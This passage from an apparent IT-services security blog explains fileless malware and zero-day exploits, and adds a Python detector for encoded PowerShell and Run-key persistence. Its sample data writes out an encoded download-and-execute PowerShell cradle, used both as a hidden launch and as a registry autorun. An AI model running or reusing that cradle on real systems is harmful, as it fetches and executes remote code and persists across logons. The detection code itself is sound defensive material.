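The per-source rule catches a single abusive client; the aggregate rule is what catches a true DDoS, where each of thousands of sources stays under any per-address threshold. The reflection traffic described above never reaches your web log at all, so that case is watched at the network edge instead: unsolicited UDP replies from port 161 arriving at a host that sent no SNMP query.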

FILELESS MALWARE ATTACKS

Traditional malware requires the attacker to drop a file onto the system. That doesn't make it any less dangerous, but it does give antivirus something to scan. We have seen an uptick in fileless malware, which writes no executable to disk. Instead it abuses tools already present in the operating system, such as PowerShell, WMI and Windows Script Host, to run the attacker's code and steal your data; the approach is also known as "living off the land". The social engineering we discussed above is a common way these actors get their first foothold. Once in, fileless malware typically persists in the registry (for example an autorun entry that launches an encoded PowerShell command) or runs only in memory, making sure it runs every time the system starts. There is no file to detect, only scripts and commands hidden in memory and registry keys, stealing whatever the attacker sees fit and turning your own network against your business.

These are often used for cryptomining attacks, in which an attacker turns an entire network into a cryptomining operation, slowing the network, jacking up energy bills and potentially wearing out hardware from sustained overload. Last year alone saw a nearly 900% rise in fileless attacks.
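Because there is no file to scan, fileless activity is caught by looking at what the built-in tools were asked to do: the command line, who launched them, and what is registered to run at logon. The following added example (not code from the original article) applies that logic to constructed process-creation and Run-key records, decoding a PowerShell -EncodedCommand payload so the analyst sees the real command. The indicators, paths and sample records are illustrative assumptions.

```python
"""Added example, not from the original article: detection logic for the
living-off-the-land pattern described above, applied to constructed
process-creation and Run-key records. It decodes -EncodedCommand payloads so
the analyst sees the real command, and flags autoruns that launch script hosts.
Indicators, paths and sample records are illustrative assumptions."""
import base64
import re

SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe")
OFFICE_APPS = ("winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe")
CRADLE_RE = re.compile(r"iex|invoke-expression|downloadstring|invoke-webrequest|"
                       r"net\.webclient|frombase64string|bitsadmin", re.I)
ENCODED_RE = re.compile(r"[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
STEALTH_RE = re.compile(r"[-/]w(?:indowstyle)?\s+hidden|[-/]nop\b|[-/]noni\b|"
                        r"[-/]ep\s+bypass|executionpolicy\s+bypass", re.I)


def decode_encoded_command(cmdline: str):
    """PowerShell -EncodedCommand takes base64 of UTF-16LE text; return that text or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def analyze_process(event: dict) -> dict:
    """Score one process-creation record (Sysmon Event ID 1 style fields)."""
    image = _basename(event["image"])
    parent = _basename(event.get("parent_image", ""))
    cmd = event["command_line"]
    reasons = []
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded PowerShell command, decodes to: " + decoded.strip())
    if STEALTH_RE.search(cmd):
        reasons.append("hidden window or execution-policy bypass switches")
    if CRADLE_RE.search(cmd) or (decoded and CRADLE_RE.search(decoded)):
        reasons.append("download-and-execute cradle")
    if image in SCRIPT_HOSTS and parent in OFFICE_APPS:
        reasons.append(f"{image} spawned by Office application {parent}")
    return {"image": image, "suspicious": bool(reasons), "reasons": reasons}


def analyze_autorun(entry: dict) -> dict:
    """Score one Run-key value: persistence that re-launches on every logon."""
    value = entry["value"]
    reasons = []
    if any(host in value.lower() for host in SCRIPT_HOSTS):
        reasons.append("autorun launches a script host instead of an installed program")
    if decode_encoded_command(value) is not None or CRADLE_RE.search(value):
        reasons.append("autorun carries an encoded or download cradle payload")
    return {"key": entry["key"], "suspicious": bool(reasons), "reasons": reasons}


# Constructed sample data. The payload is a classic download cradle, encoded the way
# PowerShell expects it (base64 over UTF-16LE); 192.0.2.10 is a documentation address.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": f"powershell.exe -NoP -NonI -W Hidden -Enc {ENCODED}"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "notepad.exe report.txt"},
]

AUTORUNS = [
    {"key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "value": f"powershell.exe -w hidden -enc {ENCODED}"},
    {"key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveSync",
     "value": r"wscript.exe //B //E:jscript C:\Users\Public\sync.js"},
    {"key": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "value": r"C:\Windows\System32\SecurityHealthSystray.exe"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(analyze_process(ev))
    for au in AUTORUNS:
        print(analyze_autorun(au))
```

The second event shows why the parent process matters: PowerShell run from a scheduled backup script is routine, while PowerShell spawned by Word with a hidden window is not, even though both are the same signed Microsoft binary. Feeding this logic requires command-line logging to be switched on (Sysmon, or Windows audit policy with command-line auditing), which is off by default.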

ZERO DAY EXPLOITS

In March, Microsoft released emergency patches for on-premises Exchange Server after it was hit by a massive worldwide zero-day exploitation campaign. A "zero-day" vulnerability is one the vendor has had zero days to fix: it is being exploited, or becomes public, before a patch exists. Attackers work long and hard to find such weaknesses in major software, and when they do, it's off to the races. It can take the vendor months to notice; in Microsoft's case the Exchange flaws were being exploited from early January, about two months before they were discovered and patched. Often the vendor isn't even the party that realizes exploitation is occurring. For the most part a security research firm or a compromised customer is the first to notice, and in most cases only after the damage is done.

These are just a few of the threats we will be hearing a lot about in 2021. How they affect you comes down to how you handle your security. The best thing you can do is partner with a security-minded MSP such as Delval Technology Solutions. This gives you access to a team of experts, world-class security technology and, most importantly, someone who has your back. On top of that, regular system maintenance, routine vulnerability checks, and keeping your firewalls and antivirus software up to date will keep the headaches and the attackers at bay, giving you the peace of mind to run your business in peace.